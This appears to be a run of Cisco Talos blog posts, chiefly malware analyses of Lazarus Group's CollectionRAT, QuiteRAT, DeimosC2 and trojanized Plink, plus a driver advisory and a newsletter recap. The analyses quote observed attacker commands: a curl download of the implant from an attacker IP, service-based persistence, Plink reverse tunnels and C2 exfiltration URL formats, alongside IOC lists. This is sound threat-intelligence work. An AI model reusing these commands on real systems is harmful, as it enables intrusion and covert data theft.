The Clop threat actor was responsible for more than a third of all ransomware attacks in July, according to multiple industry reports. Clop continues to carry out follow-on attacks associated with its massive breach of the MOVEit file transfer software. More than 4 million Colorado residents may have been affected because of the MOVEit breach, with the state’s Department of Health Care Policy & Financing (HCPF) disclosing this week that it was affected through a technology partner, IBM. HCPF stated that the MOVEit data breach leaked sensitive data but did not compromise the state agency’s internal systems. As of this week, some estimates state that more than 730 organizations have been affected by the MOVEit breach. (Cybersecurity Dive, CPO Magazine)

Can’t get enough Talos?

Upcoming events where you can find Talos

LABScon (Sept. 20 - 23)

Scottsdale, Arizona

Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with a one-click zero-day exploit.

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe
MD5: 49ae44d48c8ff0ee1b23a310cb2ecf5a
Typical Filename: nYzVlQyRnQmDcXk
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::tpd

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

SHA 256: 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440
MD5: ef6ff172bf3e480f1d633a6c53f7a35e
Typical Filename: iizbpyilb.bat
Claimed Product: N/A
Detection Name: Trojan.Agent.DDOH

SHA 256: 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf
MD5: 2cfc15cb15acc1ff2b2da65c790d7551
Typical Filename: rcx4d83.tmp
Claimed Product: N/A
Detection Name: Win.Dropper.Pykspa::tpd

Lazarus Group's infrastructure reuse leads to discovery of new malware

24 August 2023 at 12:04
  • In the Lazarus Group’s latest campaign, which we detailed in a recent blog, the North Korean state-sponsored actor is exploiting CVE-2022-47966, a ManageEngine ServiceDesk vulnerability to deploy multiple threats. In addition to their “QuiteRAT” malware, which we covered in the blog, we also discovered Lazarus Group using a new threat called “CollectionRAT.”
  • CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Based on our analysis, CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.
  • Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.
  • One such example of this trend is Lazarus Group’s use of the open-source DeimosC2 framework. The DeimosC2 agent we discovered in this campaign is an ELF binary, indicating Lazarus’ intention to deploy this implant during initial access against compromised Linux endpoints.

Lazarus Group reuses infrastructure in continuous assault on enterprises

Lazarus Group's infrastructure reuse leads to discovery of new malware

In the new Lazarus Group campaign we recently disclosed, the North Korean state-sponsored actor continues to use much of the same infrastructure despite those components being well-documented by security researchers over the years. Their continued use of the same tactics, techniques and procedures (TTPs) — many of which are publicly known — highlights the group’s confidence in their operations and presents opportunities for security researchers. By tracking and analyzing these reused infrastructure components, we identified the new CollectionRAT malware detailed in this report.

As mentioned, Lazarus Group remains highly active, with this being their third documented campaign in less than a year. In September 2022, Talos published details of a Lazarus Group campaign targeting energy providers in the United States, Canada and Japan. This campaign, enabled by the successful exploitation of the Log4j vulnerability, heavily employed a previously unknown implant we called “MagicRAT,” along with known malware families VSingle, YamaBot and TigerRAT, all of which were previously attributed to the threat actor by Japanese and Korean government agencies.

Some of the TTPs used in another Lazarus Group campaign in late 2022 have been highlighted by WithSecure. This report illustrated Lazarus Group exploiting unpatched Zimbra devices and deploying a remote access trojan (RAT) similar to MagicRAT. This is the same RAT Talos observed being deployed after Lazarus Group’s exploitation of ManageEngine ServiceDesk, which we detailed in an earlier blog, -known as “QuiteRAT.” QuiteRAT and MagicRAT are both based on the Qt framework and have similar capabilities, but QuiteRAT is likely an attempt to compact MagicRAT into a smaller and easier to deploy malicious implant based on its size.

Lazarus Group's infrastructure reuse leads to discovery of new malware


In addition to this recent campaign illustrating how active Lazarus Group remains, this activity also serves as another example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their preceding campaign from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. Lazarus has been known to use dual-use utilities in their operations, especially for reverse tunneling such as Plink and 3proxy.

Some CollectionRAT malware from 2021 was signed with the same code-signing certificate as Jupiter/EarlyRAT (also from 2021), a malware family listed in CISA’s advisory detailing recent North Korean ransomware activity.

The connections between the various malware are depicted below:

Lazarus Group's infrastructure reuse leads to discovery of new malware

Lazarus evolves malicious arsenal with CollectionRAT and DeimosC2

CollectionRAT consists of a variety of standard RAT capabilities, including the ability to run arbitrary commands and manage files on the infected endpoint. The implant consists of a packed Microsoft Foundation Class (MFC) library-based Windows binary that decrypts and executes the actual malware code on the fly. Malware developers like using MFC even though it’s a complex, object-oriented wrapper. MFC, which traditionally is used to create Windows applications’ user interfaces, controls and events, allows multiple components of malware to seamlessly work with each other while abstracting the inner implementations of the Windows OS from the authors. Using such a complex framework in malware makes human analysis more cumbersome. However, in CollectionRAT, the MFC framework has just been used as a wrapper/decrypter for the actual malicious code.

CollectionRAT initially gathers system information to fingerprint the infection and relay it to the C2 server. It then receives commands from the C2 server to perform a variety of tasks on the infected system. The implant has the ability to create a reverse shell, allowing it to run arbitrary commands on the system. The implant can read and write files from the disk and spawn new processes, allowing it to download and deploy additional payloads. The implant can also remove itself from the endpoint when directed by the C2.

Lazarus Group's infrastructure reuse leads to discovery of new malware
Implant's configuration strings.

The preliminary system information is sent to the C2 server to register the infection, which subsequently issues commands to the implant.

Lazarus Group's infrastructure reuse leads to discovery of new malware
Initial check-in over HTTP to C2 server.

CollectionRAT and its link to EarlyRAT

Analyzing CollectionRAT indicators of compromise (IOCs) enabled us to discover links to EarlyRAT, a PureBasic-based implant that security research firm Kaspersky recently attributed to the Andariel subgroup. We discovered a CollectionRAT sample signed with the same certificate used to sign an older version of EarlyRAT from 2021. Both sets of samples used the same certificate from “OSPREY VIDEO INC.” with the same serial number and thumbprint. The EarlyRAT malware was also listed in CISA’s advisory from February 2023 highlighting ransomware activity conducted by North Korea against healthcare and critical infrastructure entities across the world. Kaspersky reported that EarlyRAT is deployed via the successful exploitation of the Log4j vulnerability. EarlyRAT is also known as the “Jupiter” malware. DCSO CyTec’s blog contains more details about Jupiter.

Lazarus Group's infrastructure reuse leads to discovery of new malware
Common OSPREY VIDEO INC certificate from 2021 used to sign CollectionRAT and EarlyRAT

Adoption of open source tools during initial access — DeimosC2

Lazarus Group appears to be shifting its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase. Lazarus Group previously relied on the use of custom-built implants such as MagicRAT, VSingle, DTrack, and Yamabot as a means of establishing persistent initial access on a successfully compromised system. These implants are then instrumented to deploy a variety of open-source or dual-use tools to perform a multitude of malicious hands-on-keyboard activities in the compromised enterprise network. These include proxy tools,, credential-dumping tools such as Mimikatz and post-compromise reconnaissance and pivoting frameworks such as Impacket. However, these tools have primarily been used in the post-compromise phase of the attack. This campaign is one such instance where the attackers used the DeimosC2 open-source C2 framework as a means of initial and persistent access. DeimosC2 is a GoLang-based C2 framework supporting a variety of RAT capabilities similar to other popular C2 frameworks such as Cobalt Strike and Sliver.

DeimosC2 analysis

Apart from the many dual-use tools and post-exploitation frameworks found on Lazarus Group’s hosting infrastructure, we discovered the presence of a new implant that we identified as a beacon from the open-source DeimosC2 framework. Contrary to most of the malware found on their hosting infrastructure, the DeimosC2 implant was a Linux ELF binary, indicating the intention of the group to deploy it during the initial access on Linux-based servers.

The implant itself is an unmodified copy of the regular beacon that the DeimosC2’s C2 server produces when configured with the required parameters. It contains the standard URI paths that remain the same as the configuration provided in an out-of-the-box configuration of the implant. The lack of heavy customization of the implant indicates that the operators of DeimosC2 in this campaign may still be in the process of getting used to and adopting the framework to their needs.

Lazarus Group's infrastructure reuse leads to discovery of new malware
Configuration in the DeimosC2 implant.

Trend Micro has an excelelnt analysis of the DeimosC2, but the implants typically have various RAT capabilities such as:

  • Execute arbitrary commands on the endpoint.
  • Credential stealing and registry dumping.
  • Download and upload files from C2.
  • Shellcode execution.
  • Uninstallation of the implant.

Malicious Plink

Another open-source tool we observed Lazarus Group using is the reverse tunneling tool PuTTY Link (Plink). In the past, we’ve observed Lazarus Group use Plink to establish remote tunnel using commands such as:

pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] <Remote_IP>

The option -R forwards port 8118 on 127.0.0.1 to the remote server on port 18118.

However, we found that Lazarus Group has now started generating malicious Plink binaries out of PuTTY’s source code to embed the reverse tunnel command strings in the binary itself. The following figure shows a comparison of:

  • The malicious Plink binary on the left contains the reverse tunnel command with the switches in the format:

Plink.exe -N -R 4443:127.0.0.1:80 -P 443 -l [username]-pw [password] <Remote_IP>

  • A benign Plink binary on the right was used in 2022 by Lazarus as part of their hands-on-keyboard activity.
Lazarus Group's infrastructure reuse leads to discovery of new malware
A malicious copy of Plink (left) compared to a benign version (right), both used by Lazarus.

The malicious Plink will also create a mutex named “Global\WindowsSvchost” before establishing the remote tunnel to ensure that only one connection is made between the local machine and C2.

Coverage

Ways our customers can detect and block this threat are listed below.

Lazarus Group's infrastructure reuse leads to discovery of new malware

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat: 62248, 62253-62255.

IOCs

IOCs for this research can also be found in our GitHub repository here.

Hashes

QuiteRAT

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6

CollectionRAT

db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984

773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df

DeimosC2

05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d

Trojanized Plink

e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe

Networks IOCs

146[.]4[.]21[.]94

109[.]248[.]150[.]13

108[.]61[.]186[.]55:443

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php

hxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php

hxxp[://]109[.]248[.]150[.]13/EsaFin[.]exe

hxxp[://]146[.]4[.]21[.]94/boards/boardindex[.]php

hxxp[://]146[.]4[.]21[.]94/editor/common/cmod

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

24 August 2023 at 12:02
  • Cisco Talos discovered the North Korean state-sponsored actor Lazarus Group targeting internet backbone infrastructure and healthcare entities in Europe and the United States. This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.
  • In this campaign, the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) five days after PoCs for the exploit were publicly disclosed to deliver and deploy a newer malware threat we track as “QuiteRAT.” Security researchers first discovered this implant in February, but little has been written on it since then.
  • QuiteRAT has many of the same capabilities as Lazarus Group’s better-known MagicRAT malware, but its file size is significantly smaller. Both implants are built on the Qt framework and include capabilities such as arbitrary command execution.
  • Lazarus Group’s increasing use of the Qt framework creates challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult compared to threats created using simpler programming languages such as C/C++, DOT NET, etc. Furthermore, since Qt is rarely used in malware development, machine learning and heuristic analysis detection against these types of threats are less reliable.

Lazarus Group compromises internet backbone infrastructure company in Europe

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in Europe to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access. The successful exploitation triggered the immediate download and execution of a malicious binary via the Java runtime process. We observed Lazarus Group use the cURL command to immediately deploy the QuiteRAT binary from a malicious URL:

curl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe

The IP address 146[.]4[.]21[.]94 has been used by Lazarus since at least May 2022.

A successful download of the binary leads to the execution of the QuiteRAT binary by the Java process, resulting in the activation of the implant on the infected server. Once the implant starts running, it sends out preliminary system information to its command and control (C2) servers and then waits on the C2 to respond with either a command code to execute or an actual Windows command to execute on the endpoint via a child cmd.exe process. Some of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:

Command Intent
C:\windows\system32\cmd.exe /c systeminfo | findstr Logon Get logon server name (machine name). System Information Discovery [T1082]
C:\windows\system32\cmd.exe /c ipconfig | findstr Suffix Domain name for the system. Domain discovery [T1087/002]

There is no in-built persistence mechanism in QuiteRAT. Persistence for the implant is achieved via the registry by issuing the following command to QuiteRAT:

C:\Windows\system32\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto error= ignore binpath= cmd /K start c:\users\public\notify[.]exe

A typical infection chain looks like this:

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

Lazarus Group evolves malicious arsenal with QuiteRAT

QuiteRAT is a fairly simple remote access trojan (RAT). It consists of a compact set of statically linked Qt libraries along with some user-written code. The Qt framework is a platform for developing cross-platform applications. However, it is immensely popular for developing Graphical User Interface in applications. Although QuiteRAT, just like MagicRAT, uses embedded Qt libraries, none of these implants have a Graphical User Interface. .As seen with Lazarus Group’s MagicRAT malware, the use of Qt increases the code complexity, making human analysis harder. Using Qt also makes machine learning and heuristic analysis detection less reliable, since Qt is rarely used in malware development.

Based on QuiteRAT’s technical characteristics, including the usage of the Qt framework, we assess that this implant belongs to the previously disclosed MagicRAT family. QuiteRAT was briefly discussed in WithSecure’s report from early 2023. The new campaign we’re disclosing exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) — which has a Kenna risk score of 100 out of 100 — to deploy QuiteRAT.

The implant initially gathers some rudimentary information about the infected endpoint, including MAC addresses, IP addresses, and the current user name of the device. This information is then arranged in the format:

<MAC_address><IP_address>[0];<MAC_address><IP_address>[1];...<MAC_address><IP_address>[n];<username>

The resulting string is then used to calculate an MD4 hash, which is then used as the infection identifier (victim identifier) while conversing with the C2 server.

All the networking-related configurations, such as the C2 URLs and extended URI parameters, are encoded and stored in the malware. The strings are XOR’ed with 0x78 and then base64 encoded. This technique is in line with WithSecure’s analysis from earlier this year.

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT
Configuration strings encoded in the malware.

The URL to communicate with the C2 is constructed as follows with the following extended URI parameters:

Parameter names Values Description
mailid <12 chars from MD4> The first 12 characters from the MD4 of the information gathered from the endpoint (described earlier)
action “inbox” = send check beacon
“sent” = data is being sent to C2
Signifies the action being taken
body <base64_xorred_data> Data to be sent to C2.
param <Internal/Local IP address> The internal/LAN IP address of the infected endpoint.
session <rand> Pseudo-random number generated by the implant.

The URL for the HTTP GET to obtain inputs from the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&action=inbox&param=<Internal/Local_IP_address>&session=<rand>

Data is also sent to the C2 using the HTTP GET VERB as well. The URL for the HTTP GET to send data to the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&action=sent&body=<base64_xorred_data>param=<Internal/Local_IP_address>&session=<rand>

Any data sent to the C2 is utmost 0x400 (1,024) bytes in length. If the output of a command executed on the endpoint by the implant is larger than 1,024 bytes, the implant appends the < No Pineapple! > marker at the end of the data.

The User-Agent used during communications by the implant is

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0

The malware also has the ability to run a ping command on a random IP address that it generates on the fly. The request is usually executed using the command <compspec_path>\cmd.exe /c <IP_Address> -n 18 &:

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT
Ping command being constructed by the implant including the octets for a random IP.

The implant can also receive a command code “sendmail” along with a numeric value from the C2 server. This value is then used by the implant to Sleep for a specific period of time (in minutes) before it begins talking to the C2 server again. The adversaries likely use this functionality to keep the implant dormant for longer periods of time while ensuring continued access to the compromised enterprise network.

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

The implant also has the ability to receive a second URL from the current C2 server via the command code receivemail. The implant will then reach out to the second URL to receive commands and payloads from the server to execute on the infected system.

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

We have seen the following versions of QuiteRAT in the wild. We are only able to share one of the file hashes at this time, which is included in the IOCs section:

QuiteRAT binary name Compile date
notify.exe (32bit) May 30, 2022
acres.exe July 22, 2022
acres.exe (64bit) July 25, 2022

The latest version of Lazarus Group’s older MagicRAT implant observed in the wild was compiled in April 2022. This is the last version of MagicRAT that we know of. The use of MagicRAT’s derivative implant, QuiteRAT, beginning in May 2023 suggests the actor is changing tactics, opting for a smaller, more compact Qt-based implant.

QuiteRAT vs MagicRAT

QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much much smaller implementation, averaging around 4 to 5MB in size. This substantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into QuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework. Furthermore, while MagicRAT consists of persistence mechanisms implemented in it via the ability to set up scheduled tasks, QuiteRAT does not have a persistence capability and needs to be issued one by the C2 server to achieve continued operation on the infected endpoint. This is another contributing factor to the smaller size of QuiteRAT.

There are similarities between the implants that indicate that QuiteRAT is a derivative of MagicRAT. Apart from being built on the Qt framework, both implants consist of the same abilities, including running arbitrary commands on the infected system. Both implants also use base64 encoding to obfuscate their strings with an additional measure, such as XOR or prepending hardcoded data, to make it difficult to decode the strings automatically. Additionally, both implants use similar functionality to allow them to remain dormant on the endpoint by specifying a sleep period for them by the C2 server.

Coverage

Ways our customers can detect and block this threat are listed below.

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


IOCs

IOCs for this research can also be found at our Github repository here.

Hashes

QuiteRAT

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6

Networks IOCs

146[.]4[.]21[.]94

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php

hxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php





Three vulnerabilities in NVIDIA graphics driver could cause memory corruption

23 August 2023 at 16:56
Three vulnerabilities in NVIDIA graphics driver could cause memory corruption

Piotr Bania of Cisco Talos discovered the vulnerabilities mentioned in this post.

Cisco Talos recently disclosed three vulnerabilities in the shader functionality of the NVIDIA D3D10 driver that works with NVIDIA’s graphics cards.

The driver is vulnerable to memory corruption if an adversary sends a specially crafted shader packer, which can lead to a memory corruption problem in the driver.

All three issues, identified as TALOS-2023-1719 (CVE-2022-34671), TALOS-2023-1720 (CVE-2022-34671) and TALOS-2023-1721 (CVE-2022-34671), have a CVSS severity rating of 8.5 out of 10.

An attacker could exploit these vulnerabilities from guest machines running virtualization environments (such as VMware, QEMU and VirtualBox) to perform a guest-to-host escape, as we’ve illustrated with previous vulnerabilities in NVIDIA graphics drivers.

Talos' research also indicates that these vulnerabilities could be triggered from a web browser using WebGL and WebAssembly. Our researchers triggered these issues from a HYPER-V guest using the RemoteFX feature, leading to the execution of vulnerable code on the HYPER-V host (inside the rdvgm.exe process). Microsoft recently deprecated RemoteFX, but older machines may still use this software.

Talos worked with NVIDIA to ensure these vulnerabilities are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

For Snort coverage (SIDs 61386, 61387, 61398, 61399, 61410 and 61411) that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

Generating FLIRT signatures for Nim and other non-C programming languages

22 August 2023 at 09:03
Generating FLIRT signatures for Nim and other non-C programming languages

Adversaries are increasingly writing malware in programming languages such as Go, Rust, or Nim, because they present challenges to investigators using reverse-engineering tools designed to work best against the C family of languages.

It’s often difficult for reverse engineers examining non-C languages to differentiate between the malware author’s code and the language’s standard library code. In the vast majority of cases, Hex-Ray’s Interactive Disassembler (IDA) has the out-of-the-box capability to identify library functions or generate custom Fast Library Identification and Recognition Technology (FLIRT) signatures and solve the issue.

But for Nim, generating signatures is distinctly more difficult. Cisco Talos is excited to announce a new project to find an automated way to generate custom FLIRT signatures for IDA, which led to a talk at Recon.cx 2023 and a guest blog on Hex-Rays. This blog describes the technical details of our research.

Recapping the top stories from Black Hat and DEF CON

17 August 2023 at 18:00
Recapping the top stories from Black Hat and DEF CON

Welcome to this week’s edition of the Threat Source newsletter.

I had a significant amount of FOMO last week seeing everyone out in Vegas. (I was happy to not get conference crud sickness, but it seems like I missed a great time otherwise.)

But, as anyone who works with me could guess, I was following closely online through social media and news reporting. If you’re in the same boat as me and couldn’t attend BlackHat or DEF CON in person, I wanted to use this space to recap what I felt were the top stories and headlines coming out of the various new research that was published, talks, interviews and more.

Unsurprisingly, it seems like AI was the talk of the town. One panel, which featured the former Cyber Czar in the Obama administration, promised coming action from the Biden administration around AI and its intersection with cybersecurity, including an executive order that apparently will be as broad as earlier orders around the U.S.’ broader approach to security.

There were many other panels and talks around AI, along with questions about whether the technology has plateaued after so many companies developed their own ChatGPT-like.

I was also fascinated by several interviews and talks from an FBI official about distributed denial-of-service attacks. I’ve written before about how there’s a renewed interest in DDoS attacks recently, especially those targeting high-profile companies and games.

Two high-ranking government officials gave a joint talk at Black Hat where they said the majority of DDoS attacks are the result of a dispute over business transactions or good ‘ol fashioned video game beef.

The same presenters gave additional details on how the FBI prioritizes stopping DDoS attacks. Chances are, if you’re a bad actor who makes the news for DDoS attacks, the federal government is not far behind.

I also always love the crazy vulnerabilities or hacking methods that come out of both these conferences. A highlight for me was a group of researchers who found a way to hijack one of the most popular automatic card shufflers (fitting for Vegas) to the point that someone could know the order of cards ahead of time in a gambling game.

I’m not quite sure what the actual attack surface is here because the potential hacker would need to install a tiny physical USB device into the shuffler, and I don’t think any casino worker would be thrilled to see you crawling around on the floor, but I do always love to see the downside of putting a USB port on everything.

And there was the brief, but confusing, saga at DEFCON about the pop-up notifications iPhone users were getting asking people to pair with a rogue Apple TV. Turns out it was a harmless prank from one of the attendees, who just wanted to drive home the point that it’s important to really turn off Bluetooth all the way, and not just click the little button in the Control Center.

Lastly, we wanted to thank Viktor Zhora, the deputy chairman and chief digital transformation officer at the State Service of Special Communication and Information Protection for Ukraine, for taking the time to say “Hi” to us on the show floor. He specifically took time out of his day to make sure he could meet Matt Olney, who’s been one of our leaders in helping support Ukraine. Viktor was a speaker at BlackHat and had a very busy schedule of media appearances, so we were flattered that he made sure to see Matt.

Recapping the top stories from Black Hat and DEF CON

The one big thing

Since AI was already the talk of the town at Black Hat and DEF CON, we wanted to continue the conversation around tehse tools and the implications on cybersecurity. As one of our incident responders wrote in the latest in our “On the Radar” series, AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders. The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.

Why do I care?

AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. For defenders, though, AI also opens the door to new defensive tactics and tools, so it’s important to see the positives and negatives of AI in security.

So now what?

There is no real action for the average user to take at this point, but I feel this piece is a good opportunity for everyone to take a step back about what we currently know, and don’t know, about AI and its intersection with security.

Top security headlines of the week

Two police precincts in the U.K. had mistakenly been leaking the personal information of individuals connected to crimes for years. The UK's Norfolk and Suffolk police constabularies disclosed that, between April 2021 and March 2022, the information was accidentally attached to crime statistics distributed as part of Freedom of Information Act (FOIA) requests. The data includes personally identifiable information related to witnesses, suspects and victims of a variety of crimes, including domestic violence, assaults, thefts and hate crimes. The forces say they are now contacting more than 1,200 people who may have been affected. Representatives from the two departments said in a statement that, “Strenuous efforts have been made to determine if the data released has been accessed by anyone outside of policing. At this stage we have found nothing to suggest that this is the case.” (CSO Online, Politico)

Viktor Zhora, one of Ukraine’s top cybersecurity officials, said at Black Hat that his country is taking several steps to document what may constitute war crimes committed by Russian state-sponsored actors. Zhora said that attacks affecting critical infrastructure and communications for civilians could fall under such umbrellas and his team is actively collecting evidence as the kinetic military conflict continues. Speaking alongside Zhora, Jen Easterly, the U.S.’ top cybersecurity official, said the U.S. has learned several lessons from Russia’s invasion of Ukraine, including the importance of assistance from private cybersecurity companies. (CyberScoop, The Record)

Several years’ worth of Intel chips contains a newly discovered flaw known as “Downfall,” which is like the Meltdown and Spectre bugs from several years ago. Identified as CVE-2022-40982, the issue could allow the CPU to “unintentionally reveal internal hardware registers to software,” according to a write-up from Google’s security research team. Proof of concept code shows that an attacker could use Downfall to steal encryption keys from other users on a given server and other sensitive data. Downfall affects most CPUs in Intel's 6th through 11th-generation Core lineups for consumer PCs. Most of the affected devices were sold starting in 2015 and may still be available in systems today. Intel’s patch for the issue negatively affects the performance of the CPUs, with some studies finding that performance could dip to 40 percent. (Ars Technica, PC World)

Can’t get enough Talos?

Upcoming events where you can find Talos

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

